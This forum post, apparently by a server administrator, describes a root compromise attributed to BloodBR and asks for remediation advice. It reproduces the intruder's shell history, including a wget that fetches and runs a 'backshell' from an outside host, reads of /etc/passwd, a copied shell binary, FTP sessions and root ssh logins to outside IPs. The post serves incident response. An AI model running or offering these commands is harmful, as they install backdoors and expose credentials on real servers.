Logged in and ran 'top' as usual, but got 'permission denied'. Started poking around and found commands entered via root that I didn't enter.
Looks like BloodBR, which I did a little research on and been told is a group of kids from Brazil (but how does anyone really know) hacks into servers and replaces home pages.
Looks like they hacked on a few days ago, but no homepages have been altered, so maybe they were unsuccessful?
Looks like they installed a 'backshell' in tmp, I have renamed that, will that prevent them from being able to use it to log in (I assume it's a back door). Or would it be installed somewhere else?
Also looks like they copied 'sh' to 'badsh'. I renamed it back.
I have phpbb installed, and read that is a common access point for them, but I also had ftp'd using my admin password shortly before this hack. Changed my password afterwards, but they may have gotten in before that. Have changed passwords again.
What else should I do, or look for?
Why would something they had done cause 'top' to give me a permission denied? I can su - and then it works ok.
The commands they entered are below:
890 cd /tmp
891 ls
892 cat /etc/httpd/conf/httpd.conf | grep ServerName
893 users
894 ls
895 rm tel*
896 clear
897 cd .x
898 mkdir .x
899 cd .x
900 wget www.xinetd.hpg.com.br/backshell
901 rm ind*
902 ftp ftp.hpg.com.br
903 chmod +x backshell
904 ./backshell
905 ls
906 clear
907 ls -l
908 clear
909 ls -l
910 uname -a;id;uptime
911 cat /etc/passwd
912 cd /bin
913 cp sh badsh
914 clear
915 cd /tmp
916 cd .x
917 cd ;etc
918 cd /etc
919 ftp ftp.hpg.com.br
920 cd httpd/conf/
921 ls
922 ftp ftp.hpg.com.br
923 cd /
924 find / -name *.mdb -print
925 clear
926 users
927 ls
928 ls -l
929 cat /etc/issue
930 uname -a;id;uptime
931 cat /etc/fstab
932 ssh 212.71.97.156 -l root -p 1986
933 ssh 64.6.245.3 -l root -p 1986
934 clear
935 clear
936 exit